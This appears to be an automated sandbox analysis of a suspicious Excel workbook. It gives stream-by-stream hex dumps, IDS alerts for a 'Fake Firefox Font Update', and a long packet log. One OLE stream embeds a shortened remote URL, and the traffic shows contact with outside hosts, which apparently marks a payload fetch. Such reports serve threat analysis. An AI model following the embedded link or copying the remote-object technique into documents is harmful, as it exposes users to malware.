                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 58 3c c2 73 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "Sheet3"
                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                VBA File Name:ThisWorkbook.cls
                                Stream Size:985
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X < _ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 58 3c 5f ee 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "ThisWorkbook"
                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:\x1CompObj
                                CLSID:
                                File Type:data
                                Stream Size:114
                                Entropy:4.25248375192737
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:\x5DocumentSummaryInformation
                                CLSID:
                                File Type:data
                                Stream Size:244
                                Entropy:2.889430592781307
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                General
                                Stream Path:\x5SummaryInformation
                                CLSID:
                                File Type:data
                                Stream Size:200
                                Entropy:3.2920681057018664
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . | g . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                General
                                Stream Path:MBD001A3105/\x1CompObj
                                CLSID:
                                File Type:data
                                Stream Size:99
                                Entropy:3.631242196770981
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:MBD001A3105/Package
                                CLSID:
                                File Type:Microsoft Excel 2007+
                                Stream Size:943862
                                Entropy:7.993297968973981
                                Base64 Encoded:True
                                Data ASCII:P K . . . . . . . . . . ! . . o ^ . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 16 6f 5e 0e 16 02 00 00 ce 09 00 00 13 00 cb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:MBD001A3106/\x1Ole
                                CLSID:
                                File Type:data
                                Stream Size:680
                                Entropy:5.337550112710684
                                Base64 Encoded:False
                                Data ASCII:. . . . t . ~ \\ I * . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . a . g . r . . . m . y . / . v . J . c . D . 8 . F . ? . & . s . i . l . k . = . e . n . t . h . u . s . i . a . s . t . i . c . . . . m = . V & 2 . G " a . F . . z B v . + \\ 7 d . c . . U . k . O { u . , 8 . K | . s f . . ' . Q \\ . R < . e . J 1 r l m . d h t ! . . c . < . % ) F . w . ` 7 . . . . . . . . . . . . . . . . ^ . . . 6 . e . L . L . y . k . l . c . W . g . Q . b . V . I . v . 9 . O . Q . F . I .
                                Data Raw:01 00 00 02 fb 74 b8 18 7e 5c 49 2a 00 00 00 00 00 00 00 00 00 00 00 00 ea 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b e6 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 61 00 67 00 72 00 2e 00 6d 00 79 00 2f 00 76 00 4a 00 63 00 44 00 38 00 46 00 3f 00 26 00 73 00 69 00 6c 00 6b 00 3d 00 65 00 6e 00 74 00 68 00 75 00 73 00 69 00 61 00 73 00 74 00 69 00 63 00
                                General
                                Stream Path:Workbook
                                CLSID:
                                File Type:Applesoft BASIC program data, first line number 16
                                Stream Size:97639
                                Entropy:7.992089973780545
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . - j . @ . M . . , K 7 h k o . ] . F ` = . F X . . . . . . . . . . ^ . . . \\ . p . c Q W . . . . E u . . W K g _ T \\ . . . u J U . ! c D } . u d E = D O @ B W ? . . Q I . g } $ . k 9 e . B . . . = I a . . . 9 D . . . = . . . . m 9 . . . P g . X L . i . . . . . . . . H . . . . . . . . d . . . . . . J " = . . . q ? . I ` . ? < / . . @ . . . . . . . . } " . . . . . . . . 9 . . . . 1 ` . . . . 1 . . . | T V \\ L . . { f F . C n } P . 9 1 . . . . Q . . F $ !
                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 2d 84 6a c2 a0 40 b5 d5 bc 4d ca f2 95 01 1d bb f4 b1 ea 2c 9e f4 bb 4b f7 37 b1 a9 68 6b 6f ec f9 1d a2 c4 5d b4 05 46 60 cd 3d 89 ba 00 46 58 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 5e c3 e2 00 00 00 5c 00 70 00 63 ab 51 57 b7 09 a8 04 d1 06 03 ae 45 75 e0 ca 00 99 cd 8b c1 57 ae ed f5 fc
                                General
                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                CLSID:
                                File Type:ASCII text, with CRLF line terminators
                                Stream Size:525
                                Entropy:5.22950296860598
                                Base64 Encoded:True
                                Data ASCII:I D = " { E 1 E B 2 6 F C - B 2 9 9 - 4 2 A 8 - A 1 B E - 7 E 1 6 2 1 5 1 C 0 5 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 E 3 C D D C 2 6 7 4 2 4 0 4 6 4
                                Data Raw:49 44 3d 22 7b 45 31 45 42 32 36 46 43 2d 42 32 39 39 2d 34 32 41 38 2d 41 31 42 45 2d 37 45 31 36 32 31 35 31 43 30 35 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                General
                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                CLSID:
                                File Type:data
                                Stream Size:104
                                Entropy:3.0488640812019017
                                Base64 Encoded:False
                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                CLSID:
                                File Type:data
                                Stream Size:2644
                                Entropy:3.994345845099388
                                Base64 Encoded:False
                                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                CLSID:
                                File Type:data
                                Stream Size:553
                                Entropy:6.368451908832245
                                Base64 Encoded:True
                                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 86 b1 fb 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47


                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                2025-03-26T19:48:43.839468+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49699 | 13.107.246.41 | 443 | TCP
                                2025-03-26T19:48:51.583738+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49701 | 13.107.246.41 | 443 | TCP
                                2025-03-26T19:48:51.593285+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49702 | 13.107.246.41 | 443 | TCP
                                • Total Packets: 203
                                • 443 (HTTPS)
                                • 80 (HTTP)
                                • 53 (DNS)
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Mar 26, 2025 19:48:29.306616068 CET | 49697 | 443 | 192.168.2.7 | 147.79.86.93
                                Mar 26, 2025 19:48:29.306660891 CET | 443 | 49697 | 147.79.86.93 | 192.168.2.7
                                Mar 26, 2025 19:48:29.307032108 CET | 49697 | 443 | 192.168.2.7 | 147.79.86.93
                                Mar 26, 2025 19:48:29.307032108 CET | 49697 | 443 | 192.168.2.7 | 147.79.86.93
                                Mar 26, 2025 19:48:29.307064056 CET | 443 | 49697 | 147.79.86.93 | 192.168.2.7
                                Mar 26, 2025 19:48:29.721252918 CET | 443 | 49697 | 147.79.86.93 | 192.168.2.7
                                Mar 26, 2025 19:48:29.721548080 CET | 49697 | 443 | 192.168.2.7 | 147.79.86.93
                                Mar 26, 2025 19:48:29.730257988 CET | 49697 | 443 | 192.168.2.7 | 147.79.86.93
                                Mar 26, 2025 19:48:29.730277061 CET | 443 | 49697 | 147.79.86.93 | 192.168.2.7
                                Mar 26, 2025 19:48:29.730582952 CET | 443 | 49697 | 147.79.86.93 | 192.168.2.7
                                Mar 26, 2025 19:48:29.731168985 CET | 49697 | 443 | 192.168.2.7 | 147.79.86.93
                                Mar 26, 2025 19:48:29.731168985 CET | 49697 | 443 | 192.168.2.7 | 147.79.86.93
                                Mar 26, 2025 19:48:29.772277117 CET | 443 | 49697 | 147.79.86.93 | 192.168.2.7
                                Mar 26, 2025 19:48:30.160128117 CET | 443 | 49697 | 147.79.86.93 | 192.168.2.7
                                Mar 26, 2025 19:48:30.160185099 CET | 49697 | 443 | 192.168.2.7 | 147.79.86.93
                                Mar 26, 2025 19:48:30.160208941 CET | 443 | 49697 | 147.79.86.93 | 192.168.2.7
                                Mar 26, 2025 19:48:30.160222054 CET | 443 | 49697 | 147.79.86.93 | 192.168.2.7
                                Mar 26, 2025 19:48:30.160250902 CET | 49697 | 443 | 192.168.2.7 | 147.79.86.93
                                Mar 26, 2025 19:48:30.160274982 CET | 49697 | 443 | 192.168.2.7 | 147.79.86.93
                                Mar 26, 2025 19:48:30.185911894 CET | 49697 | 443 | 192.168.2.7 | 147.79.86.93
                                Mar 26, 2025 19:48:30.185939074 CET | 443 | 49697 | 147.79.86.93 | 192.168.2.7
                                Mar 26, 2025 19:48:30.194477081 CET | 49698 | 80 | 192.168.2.7 | 172.245.123.32
                                Mar 26, 2025 19:48:30.293068886 CET | 80 | 49698 | 172.245.123.32 | 192.168.2.7
                                Mar 26, 2025 19:48:30.293169975 CET | 49698 | 80 | 192.168.2.7 | 172.245.123.32
                                Mar 26, 2025 19:48:30.293559074 CET | 49698 | 80 | 192.168.2.7 | 172.245.123.32
                                Mar 26, 2025 19:48:30.395308971 CET | 80 | 49698 | 172.245.123.32 | 192.168.2.7
                                Mar 26, 2025 19:48:30.395324945 CET | 80 | 49698 | 172.245.123.32 | 192.168.2.7
                                Mar 26, 2025 19:48:30.395339012 CET | 80 | 49698 | 172.245.123.32 | 192.168.2.7
                                Mar 26, 2025 19:48:30.395351887 CET | 80 | 49698 | 172.245.123.32 | 192.168.2.7
                                Mar 26, 2025 19:48:30.395391941 CET | 49698 | 80 | 192.168.2.7 | 172.245.123.32
                                Mar 26, 2025 19:48:30.395394087 CET | 80 | 49698 | 172.245.123.32 | 192.168.2.7
                                Mar 26, 2025 19:48:30.395407915 CET | 80 | 49698 | 172.245.123.32 | 192.168.2.7
                                Mar 26, 2025 19:48:30.395420074 CET | 80 | 49698 | 172.245.123.32 | 192.168.2.7
                                Mar 26, 2025 19:48:30.395441055 CET | 49698 | 80 | 192.168.2.7 | 172.245.123.32
                                Mar 26, 2025 19:48:30.395459890 CET | 49698 | 80 | 192.168.2.7 | 172.245.123.32
                                Mar 26, 2025 19:48:30.395483017 CET | 49698 | 80 | 192.168.2.7 | 172.245.123.32
                                Mar 26, 2025 19:48:35.409110069 CET | 80 | 49698 | 172.245.123.32 | 192.168.2.7
                                Mar 26, 2025 19:48:35.409183979 CET | 49698 | 80 | 192.168.2.7 | 172.245.123.32
                                Mar 26, 2025 19:48:43.549446106 CET | 49699 | 443 | 192.168.2.7 | 13.107.246.41
                                Mar 26, 2025 19:48:43.549489021 CET | 443 | 49699 | 13.107.246.41 | 192.168.2.7
                                Mar 26, 2025 19:48:43.549763918 CET | 49699 | 443 | 192.168.2.7 | 13.107.246.41
                                Mar 26, 2025 19:48:43.550236940 CET | 49699 | 443 | 192.168.2.7 | 13.107.246.41
                                Mar 26, 2025 19:48:43.550250053 CET | 443 | 49699 | 13.107.246.41 | 192.168.2.7
                                Mar 26, 2025 19:48:43.839391947 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:43.839468002 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:43.841424942 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:43.841439962 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:43.841726065 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:43.843553066 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:43.884273052 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.111735106 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.111752987 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.111807108 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.111861944 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.111890078 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.111958981 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.111958981 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.134248972 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.134279013 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.134377003 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.134397030 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.134462118 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.201958895 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.201986074 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.202088118 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.202101946 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.202321053 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.220386028 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.220415115 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.220576048 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.220576048 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.220590115 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.220834017 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.242105961 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.242125988 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.242191076 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.242209911 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.242382050 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.297960043 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.297983885 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.298062086 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.298093081 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.298285961 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.327611923 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.327630997 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.327825069 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.327841997 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.328144073 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.352880955 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.352900982 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.352999926 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.353024006 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.353332996 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.394684076 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.394704103 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.394783974 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.394783974 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.394798040 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.395212889 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.423342943 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.423362970 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.423448086 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.423475981 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.423556089 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.452860117 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.452882051 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.453409910 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.453425884 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.453501940 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.489087105 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.489105940 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.489181042 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.489206076 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.489288092 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.517188072 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.517208099 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.517317057 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.517317057 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.517332077 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.517442942 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.540374041 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.540396929 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.540498018 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.540523052 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.540734053 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.575489044 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.575508118 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.575572968 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.575591087 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.575797081 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.576371908 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.603154898 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.603173018 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.603261948 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.603283882 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.603430986 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.625180006 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.625209093 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.625300884 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.625318050 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.625514030 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.652246952 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.652282000 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.652364016 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.652384043 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.652610064 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.682929039 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.682955980 CET4434969913.107.246.41192.168.2.7
